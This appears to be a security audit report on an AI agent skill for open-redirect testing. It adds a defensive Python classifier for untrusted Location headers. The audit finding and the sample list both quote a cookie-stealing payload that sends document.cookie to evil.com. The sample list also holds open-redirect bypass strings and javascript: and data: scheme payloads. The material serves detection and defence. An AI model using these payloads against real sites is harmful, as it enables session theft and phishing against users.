testing-for-open-redirect-vulnerabilities

Fail

Audited by Snyk on Apr 9, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 0.90). The content is dual-use but contains explicit, actionable guidance and payloads for credential/token exfiltration and phishing (e.g., javascript:fetch('https://evil.com/?c='+document.cookie), OAuth redirect_uri chaining, data: and javascript: payloads), which meaningfully enables malicious abuse despite being presented as a testing tool.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill clearly fetches and interprets arbitrary external web pages: scripts/agent.py issues HTTP requests to user-supplied target URLs and parses Location headers and resp.text (and SKILL.md shows curl examples against target.com), so untrusted third-party content directly influences test decisions and subsequent actions.
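An added example, not part of the audited skill or of Snyk's report: the defensive side of the two findings above. A test harness that receives Location headers from a target is consuming untrusted third-party content (W011), so it should classify each value before anything acts on it; that classification also has to reject the javascript: and data: scheme payloads named in E006 and report off-origin targets as open-redirect candidates rather than following them. target.com and evil.com are placeholders carried over from the report, the sample Location values are constructed, and the single-host allowlist is an assumption.

```python
"""Classify untrusted Location header values before acting on them.

Added example: not code from the audited skill or from Snyk. All Location
values below are constructed samples; target.com / evil.com are placeholders.
"""
from __future__ import annotations

from urllib.parse import urljoin, urlsplit

# Schemes a browser would execute rather than navigate to. Never follow these.
DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}


def normalize_location(location: str) -> str:
    """Apply the browser-side normalizations attackers rely on to slip past
    naive string checks: trim whitespace, drop ASCII control characters
    ('java\\tscript:' becomes 'javascript:') and treat backslashes as
    slashes ('/\\evil.com' becomes '//evil.com')."""
    cleaned = "".join(ch for ch in location.strip() if ord(ch) > 0x1F)
    return cleaned.replace("\\", "/")


def classify_redirect(base_url: str, location: str, allowed_hosts: set[str]) -> str:
    """Return 'dangerous-scheme', 'external' or 'internal' for a Location value
    received in a response from base_url.

    allowed_hosts is the exact set of hostnames the application may redirect
    to. Matching is exact on purpose: suffix or prefix matching is what lets
    'target.com.evil.com' or 'https://target.com@evil.com/' through."""
    loc = normalize_location(location)
    if urlsplit(loc).scheme.lower() in DANGEROUS_SCHEMES:
        return "dangerous-scheme"
    # Resolve relative and scheme-relative ('//evil.com') values the way a
    # browser would, then judge the final hostname rather than the raw string.
    resolved = urlsplit(urljoin(base_url, loc))
    if resolved.scheme.lower() not in {"http", "https"}:
        return "dangerous-scheme"
    host = (resolved.hostname or "").lower().rstrip(".")
    return "internal" if host in allowed_hosts else "external"


def triage_redirects(base_url: str, locations: list[str],
                     allowed_hosts: set[str]) -> dict[str, list[str]]:
    """Group observed Location values by verdict so a harness can report
    open-redirect candidates without ever requesting them."""
    verdicts: dict[str, list[str]] = {"dangerous-scheme": [], "external": [], "internal": []}
    for loc in locations:
        verdicts[classify_redirect(base_url, loc, allowed_hosts)].append(loc)
    return verdicts


# Constructed sample: Location values as a redirect endpoint might echo them back.
SAMPLE_LOCATIONS = [
    "/account",                                   # ordinary in-app redirect
    "https://target.com/dashboard",               # absolute, same host
    "//evil.com/phish",                           # scheme-relative escape
    "/\\evil.com",                                # backslash variant browsers normalize
    "https://target.com@evil.com/",               # userinfo trick: real host is evil.com
    "https://target.com.evil.com/",               # suffix confusion
    "javascript:fetch('https://evil.com/?c='+document.cookie)",
    "JaVaScRiPt:alert(document.domain)",          # mixed-case scheme
    "data:text/html,<script>alert(1)</script>",
]

if __name__ == "__main__":
    report = triage_redirects("https://target.com/login", SAMPLE_LOCATIONS, {"target.com"})
    for verdict, items in report.items():
        print(f"{verdict}:")
        for item in items:
            print(f"  {item}")
```

The classifier only ever produces a label; it never fetches the resolved URL, so untrusted response content decides what gets reported, not what gets requested next. Hostnames are compared after resolution, which is why the backslash, scheme-relative and userinfo variants all land in the same "external" bucket as a plain absolute off-origin URL.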

Issues (2)

  • E006 (CRITICAL): Malicious code pattern detected in skill scripts.
  • W011 (MEDIUM): Third-party content exposure detected (indirect prompt injection risk).

Audit Metadata

Risk Level: CRITICAL
Analyzed: Apr 9, 2026, 06:48 PM
Issues: 2